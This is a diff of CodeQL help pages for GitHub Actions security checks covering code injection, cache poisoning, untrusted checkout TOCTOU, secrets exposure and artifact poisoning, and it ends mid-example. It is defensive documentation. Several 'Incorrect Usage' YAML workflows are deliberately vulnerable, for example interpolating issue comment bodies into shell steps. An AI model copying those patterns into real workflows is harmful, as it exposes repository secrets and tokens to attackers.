input](https://securitylab.github.com/research/github-actions-untrusted-input). diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.md b/ql/src/Security/CWE-094/CodeInjectionMedium.md index 9939c88eb19..cc85f68fb0d 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.md +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.md @@ -1,16 +1,20 @@ # Code Injection in GitHub Actions +## Description + Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. -## Recommendation +## Recommendations The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. -## Example +## Examples + +### Incorrect Usage The following example lets a user inject an arbitrary shell command: @@ -40,6 +44,8 @@ jobs: echo '${{ env.BODY }}' ``` +### Correct Usage + The following example uses shell syntax to read the environment variable and will prevent the attack: ```yaml @@ -53,6 +59,22 @@ jobs: echo "$BODY" ``` +The following example uses `process.env` to read environment variables within JavaScript code. + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - uses: uses: actions/github-script@v4 + env: + BODY: ${{ github.event.issue.body }} + with: + script: | + const { BODY } = process.env + ... +``` + ## References - GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md new file mode 100644 index 00000000000..61fab1d8ed4 --- /dev/null +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md @@ -0,0 +1,13 @@ +# Use of Actions with known vulnerabilities + +## Description + +The security of the workflow and the repository could be compromised by GitHub Actions workflows that utilize third-party GitHub Actions with known vulnerabilities. + +## Recommendations + +Either remove the component from the workflow or upgrade it to a version that is not vulnerable. + +## References + +- [GitHub Docs: Keeping your actions up to date with Dependabot](https://docs.github.com/en/code-security/dependabot/working-with-dependabot/keeping-your-actions-up-to-date-with-dependabot) diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.md b/ql/src/Security/CWE-275/MissingActionsPermissions.md index 5c0e433c5cb..31ddab5329d 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.md +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.md @@ -1,9 +1,11 @@ # Actions Job and Workflow Permissions are not set -A GitHub Actions job or workflow hasn't set permissions to restrict privileges to the workflow job. -A workflow job by default without the `permissions` key or a root workflow `permissions` will run with all the permissions which can be given to a workflow. +## Description -## Recommendation +A GitHub Actions job or workflow hasn't set explicit permissions to restrict privileges to the workflow job. +A workflow job by default without the `permissions` key or a root workflow `permissions` will run with the default permissions defined at the repository level. For organizations created before February 2023, including many significant OSS projects and corporations, the default permissions grant read-write access to repositories, and new repositories inherit these old, insecure permissions. + +## Recommendations Add the `permissions` key to the job or workflow (applied to all jobs) and set the permissions to the least privilege required to complete the task: @@ -12,11 +14,18 @@ name: "My workflow" permissions: contents: read pull-requests: write +``` -# or +or + +```yaml jobs: my-job: permissions: contents: read pull-requests: write ``` + +## References + +- [Assigning permissions to jobs](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/assigning-permissions-to-jobs) diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.md b/ql/src/Security/CWE-285/ImproperAccessControl.md new file mode 100644 index 00000000000..c517ff98e58 --- /dev/null +++ b/ql/src/Security/CWE-285/ImproperAccessControl.md @@ -0,0 +1,57 @@ +# Improper Access Control + +## Description + +An authorization check may not be properly implemented, allowing an attacker to mutate the code after it has been reviewed. + +## Recommendations + +When using Label gates, make sure that the code cannot be modified after it has been reviewed and the label has been set. + +## Examples + +### Incorrect Usage + +The following example shows a job that requires the label `safe to test` to be set before running untrusted code. However, the workflow gets triggered on `synchronize` activity type and, therefore, it will get triggered every time there is a change in the Pull Request. An attacker can modify the code of the Pull Request after the code has been reviewed and the label has been set. + +```yaml +on: + pull_request_target: + types: [opened, synchronize] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd +``` + +### Correct Usage + +Make sure that the workflow only gets triggered when the label is set and use an inmutable commit (`github.event.pull_request.head.sha`) instead of a mutable reference. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.sha}} + - run: ./cmd +``` + +## References + +- [Events that trigger workflows](https://docs.github.com/en/actions/writing-workflows/choosing-when-your-workflow-runs/events-that-trigger-workflows#pull_request_target) diff --git a/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md b/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md new file mode 100644 index 00000000000..9351af5cf1e --- /dev/null +++ b/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md @@ -0,0 +1,52 @@ +# Excessive Secrets Exposure + +## Description + +When the workflow runner cannot determine what secrets are needed to run the workflow, it will pass all the available secrets to the runner including organization and repository secrets. This violates the least privileged principle and increases the impact of a potential vulnerability affecting the workflow. + +## Recommendations + +Only pass those secrets that are needed by the workflow. Avoid using expressions such as `toJSON(secrets)` or dynamically accessed secrets such as `secrets[format('GH_PAT_%s', matrix.env)]` since the workflow will need to receive all secrets to decide at runtime which one needs to be used. + +## Examples + +### Incorrect Usage + +```yaml +env: + ALL_SECRETS: ${{ toJSON(secrets) }} +``` + +```yaml +strategy: + matrix: + env: [PROD, DEV] +env: + GH_TOKEN: ${{ secrets[format('GH_PAT_%s', matrix.env)] }} +``` + +### Correct Usage + +```yaml +env: + NEEDED_SECRET: ${{ secrets.GH_PAT }} +``` + +```yaml +strategy: + matrix: + env: [PROD, DEV] +--- +if: matrix.env == "PROD" +env: + GH_TOKEN: ${{ secrets.GH_PAT_PROD }} +--- +if: matrix.env == "DEV" +env: + GH_TOKEN: ${{ secrets.GH_PAT_DEV }} +``` + +## References + +- [Using secrets in GitHub Actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/using-secrets-in-github-actions#using-encrypted-secrets-in-a-workflow) +- [Job uses all secrets](https://github.com/boostsecurityio/poutine/blob/main/docs/content/en/rules/job_all_secrets.md) diff --git a/ql/src/Security/CWE-312/UnmaskedSecretExposure.md b/ql/src/Security/CWE-312/UnmaskedSecretExposure.md new file mode 100644 index 00000000000..6c681856a7b --- /dev/null +++ b/ql/src/Security/CWE-312/UnmaskedSecretExposure.md @@ -0,0 +1,37 @@ +# Unmasked Secret Exposure + +## Description + +Secrets derived from other secrets are not know to the workflow runner and therefore not masked unless explicitly registered. + +## Recommendations + +Avoid defining non-plain secrets. For example, do not define a new secret containing a JSON object and then read properties out of it from the workflow since these read values will not be masked by the workflow runner. + +## Examples + +### Incorrect Usage + +```yaml +- env: + username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} + password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} + run: | + echo "$username" + echo "$password" +``` + +### Correct Usage + +```yaml +- env: + username: ${{ secrets.AZURE_CREDENTIALS_CLIENT_ID }} + password: ${{ secrets.AZURE_CREDENTIALS_CLIENT_SECRET }} + run: | + echo "$username" + echo "$password" +``` + +## References + +- [Using secrets in GitHub Actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/using-secrets-in-github-actions#using-encrypted-secrets-in-a-workflow) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md new file mode 100644 index 00000000000..fb927f97c68 --- /dev/null +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md @@ -0,0 +1,83 @@ +# Cache Poisoning in GitHub Actions + +## Description + +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. + +An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: + +1. Steal the cache access token and URL +2. Fill the cache to trigger eviction of legitimate entries +3. Poison cache entries with malicious payloads +4. Achieve code execution in privileged workflows that restore the poisoned cache + +This allows lateral movement from low-privileged to high-privileged workflows within a repository. + +### Cache Structure + +In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches. + +- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`. + +- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly. + +Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`. + +## Recommendations + +1. Avoid using caching in workflows that handle sensitive operations like releases. +2. If caching must be used: + - Validate restored cache contents before use + - Use short-lived, workflow-specific cache keys + - Clear caches regularly +3. Implement strict isolation between untrusted and privileged workflow execution: +4. Never run untrusted code in the context of the default branch +5. Sign the cache value cryptographically and verify the signature before usage. + +## Examples + +### Incorrect Usage + +The following workflow is vulnerable to code injection in a non-privileged job but in the context of the default branch. + +```yaml +name: Vulnerable Workflow +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: {} + runs-on: ubuntu-latest + steps: + - run: | + echo ${{ github.event.comment.body }} +``` + +### Correct Usage + +The following workflow is not vulnerable to code injections even if it runs in the context of the default branch. + +```yaml +name: Secure Workflow +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: {} + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.comment.body }} + run: | + echo "$BODY" +``` + +## References + +- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/) +- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows) +- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md new file mode 100644 index 00000000000..c3c5970c37f --- /dev/null +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md @@ -0,0 +1,101 @@ +# Cache Poisoning in GitHub Actions + +## Description + +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. + +An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: + +1. Steal the cache access token and URL +2. Fill the cache to trigger eviction of legitimate entries +3. Poison cache entries with malicious payloads +4. Achieve code execution in privileged workflows that restore the poisoned cache + +This allows lateral movement from low-privileged to high-privileged workflows within a repository. + +### Cache Structure + +In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches. + +- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`. + +- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly. + +Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`. + +## Recommendations + +1. Avoid using caching in workflows that handle sensitive operations like releases. +2. If caching must be used: + - Validate restored cache contents before use + - Use short-lived, workflow-specific cache keys + - Clear caches regularly +3. Implement strict isolation between untrusted and privileged workflow execution: +4. Never run untrusted code in the context of the default branch +5. Sign the cache value cryptographically and verify the signature before usage. + +## Examples + +### Incorrect Usage + +The following workflow is caching an attacker-controlled file (`large_file`) in the context of the default branch. + +```yaml +name: Vulnerable Workflow +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- +``` + +### Correct Usage + +The following workflow is not checking out untrusted files and, therefore, is caching trusted files only. + +```yaml +name: Secure Workflow +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- +``` + +## References + +- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/) +- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows) +- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md new file mode 100644 index 00000000000..70df52dc463 --- /dev/null +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md @@ -0,0 +1,85 @@ +# Cache Poisoning in GitHub Actions + +## Description + +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. + +An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: + +1. Steal the cache access token and URL +2. Fill the cache to trigger eviction of legitimate entries +3. Poison cache entries with malicious payloads +4. Achieve code execution in privileged workflows that restore the poisoned cache + +This allows lateral movement from low-privileged to high-privileged workflows within a repository. + +### Cache Structure + +In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches. + +- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`. + +- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly. + +Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`. + +## Recommendations + +1. Avoid using caching in workflows that handle sensitive operations like releases. +2. If caching must be used: + - Validate restored cache contents before use + - Use short-lived, workflow-specific cache keys + - Clear caches regularly +3. Implement strict isolation between untrusted and privileged workflow execution: +4. Never run untrusted code in the context of the default branch +5. Sign the cache value cryptographically and verify the signature before usage. + +## Examples + +### Incorrect Usage + +The following workflow runs untrusted code in a non-privileged job but in the context of the default branch. + +```yaml +name: Vulnerable Workflow +on: + pull_request_target: + branches: [main] +permissions: {} +jobs: + test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Run tests + run: ./run_tests.sh +``` + +### Correct Usage + +The following workflow runs untrusted code in a non-privileged job and in the context of a non-default branch. + +```yaml +name: Secure Workflow +on: + pull_request: + branches: [main] +permissions: {} +jobs: + test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Run tests + run: ./run_tests.sh +``` + +## References + +- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/) +- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows) +- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md new file mode 100644 index 00000000000..105fe6ecd69 --- /dev/null +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md @@ -0,0 +1,168 @@ +# Untrusted Checkout TOCTOU + +## Description + +Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. + +## Recommendations + +Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check: + +- Issue Ops: Verify that Commit containing the code to be executed was commited **before** then date the of the comment. +- Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. +- Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. + +## Examples + +### Incorrect Usage (Issue Ops) + +The following workflow runs untrusted code after either a member or admin of the repository comments on a Pull Request with the text `/run-tests`. Although it may seem secure, the workflow is checking out a mutable reference (`${{ steps.comment-branch.outputs.head_ref }}`) and therefore the code can be mutated between the time of check (TOC) and the time of use (TOU). + +```yaml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +jobs: + benchmark: + name: Integration Tests + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + permissions: "write-all" + runs-on: [ubuntu-latest] + steps: + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - name: Checkout PR branch + uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + - run: ./cmd +``` + +### Correct Usage (Issue Ops) + +In the following example, the workflow checks if the latest commit of the Pull Request head was commited **before** the comment on the Pull Request, therefore ensuring that it was not mutated after the check. + +```yaml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +jobs: + benchmark: + name: Integration Tests + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + permissions: "write-all" + runs-on: [ubuntu-latest] + steps: + - name: Get PR Info + id: pr + env: + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + GH_REPO: ${{ github.repository }} + COMMENT_AT: ${{ github.event.comment.created_at }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Updating is not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + - name: Checkout PR branch + uses: actions/checkout@v3 + with: + ref: ${{ steps.pr.outputs.head_sha }} + - run: ./cmd +``` + +### Incorrect Usage (Deployment Environment Approval) + +The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. + +```yml +on: + pull_request_target: + types: [Created] +jobs: + test: + environment: NeedsApproval + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd +``` + +### Correct Usage (Deployment Environment Approval) + +Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. + +```yml +on: + pull_request_target: + types: [Created] +jobs: + test: + environment: NeedsApproval + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.sha }} + - run: ./cmd +``` + +### Incorrect Usage (Label Gates) + +The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./cmd +``` + +### Correct Usage (Label Gates) + +Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./cmd +``` + +## References + +- [ActionsTOCTOU](https://github.com/AdnaneKhan/ActionsTOCTOU) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md new file mode 100644 index 00000000000..105fe6ecd69 --- /dev/null +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md @@ -0,0 +1,168 @@ +# Untrusted Checkout TOCTOU + +## Description + +Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. + +## Recommendations + +Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check: + +- Issue Ops: Verify that Commit containing the code to be executed was commited **before** then date the of the comment. +- Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. +- Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. + +## Examples + +### Incorrect Usage (Issue Ops) + +The following workflow runs untrusted code after either a member or admin of the repository comments on a Pull Request with the text `/run-tests`. Although it may seem secure, the workflow is checking out a mutable reference (`${{ steps.comment-branch.outputs.head_ref }}`) and therefore the code can be mutated between the time of check (TOC) and the time of use (TOU). + +```yaml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +jobs: + benchmark: + name: Integration Tests + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + permissions: "write-all" + runs-on: [ubuntu-latest] + steps: + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - name: Checkout PR branch + uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + - run: ./cmd +``` + +### Correct Usage (Issue Ops) + +In the following example, the workflow checks if the latest commit of the Pull Request head was commited **before** the comment on the Pull Request, therefore ensuring that it was not mutated after the check. + +```yaml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +jobs: + benchmark: + name: Integration Tests + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + permissions: "write-all" + runs-on: [ubuntu-latest] + steps: + - name: Get PR Info + id: pr + env: + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + GH_REPO: ${{ github.repository }} + COMMENT_AT: ${{ github.event.comment.created_at }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Updating is not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + - name: Checkout PR branch + uses: actions/checkout@v3 + with: + ref: ${{ steps.pr.outputs.head_sha }} + - run: ./cmd +``` + +### Incorrect Usage (Deployment Environment Approval) + +The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. + +```yml +on: + pull_request_target: + types: [Created] +jobs: + test: + environment: NeedsApproval + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd +``` + +### Correct Usage (Deployment Environment Approval) + +Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. + +```yml +on: + pull_request_target: + types: [Created] +jobs: + test: + environment: NeedsApproval + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.sha }} + - run: ./cmd +``` + +### Incorrect Usage (Label Gates) + +The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./cmd +``` + +### Correct Usage (Label Gates) + +Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./cmd +``` + +## References + +- [ActionsTOCTOU](https://github.com/AdnaneKhan/ActionsTOCTOU) diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md new file mode 100644 index 00000000000..be1b566083a --- /dev/null +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md @@ -0,0 +1,63 @@ +# If Condition Always Evaluates to True + +## Description + +GitHub Workflow Expressions (`${{ ... }}`) used in the `if` condition of jobs or steps must not contain extra characters or spaces. Otherwise, the condition is invariably evaluated to `true`. + +When an `if` condition erroneously evaluates to `true`, unintended steps may be executed, leading to logic bugs and potentially exposing parts of the workflow designed to run only in secure scenarios. This behavior subverts the intended conditional logic of the workflow, leading to potential security vulnerabilities and unintentional consequences. + +## Recommendation + +To avoid the vulnerability where an `if` condition always evaluates to `true`, it is crucial to eliminate any extra characters or spaces in your GitHub Actions expressions: + +1. Do not use Workflow Expressions in `if` conditions. +2. Avoid multiline or spaced-out conditional expressions that might inadvertently introduce unwanted characters or formatting. +3. Test the workflow to ensure the `if` conditions behave as expected under different scenarios. + +## Examples + +### Correct Usage + +1. Do not use Workflow Expressions: + +```yaml +if: steps.checks.outputs.safe_to_run == true +if: |- + steps.checks.outputs.safe_to_run == true +if: | + steps.checks.outputs.safe_to_run == true +``` + +2. If using Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: + +```yaml +if: ${{ steps.checks.outputs.safe_to_run == true }} +if: |- + ${{ steps.checks.outputs.safe_to_run == true }} +``` + +### Incorrect Usage + +1. Do not mix Workflow Expressions with un-delimited expressions: + +```yaml +if: ${{ steps.checks.outputs.safe_to_run }} == true +``` + +2. Do not include trailing new lines or spaces: + +```yaml +if: | + ${{ steps.checks.outputs.safe_to_run == true }} +if: > + ${{ steps.checks.outputs.safe_to_run == true }} +if: " ${{ steps.checks.outputs.safe_to_run == true }}" +if: |+ + ${{ steps.checks.outputs.safe_to_run == true }} +if: >+ + ${{ steps.checks.outputs.safe_to_run == true }} +``` + +## References + +- [Expression Always True Github Issue](https://github.com/actions/runner/issues/1173) diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md new file mode 100644 index 00000000000..2d7afb6b66e --- /dev/null +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md @@ -0,0 +1,72 @@ +# Artifact poisoning + +## Description + +The workflow download artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Always consider artifacts content as untrusted. +- Extract the contents of artifacts to a temporary folder so they cannot override existing files. +- Verify the contents of the artifacts downloaded. If an artifact is expected to contain a numeric value, verify it before using it. + +## Examples + +### Incorrect Usage + +The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs an script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files. An attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. + +```yaml +name: Insecure Workflow + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - uses: dawidd6/action-download-artifact@v2 + with: + name: pr_number + - name: Run command + run: | + sh cmd.sh +``` + +### Correct Usage + +The following example, correctly creates a temporary directory and stores the contents of the artifact there before calling `cmd.sh`. + +```yaml +name: Insecure Workflow 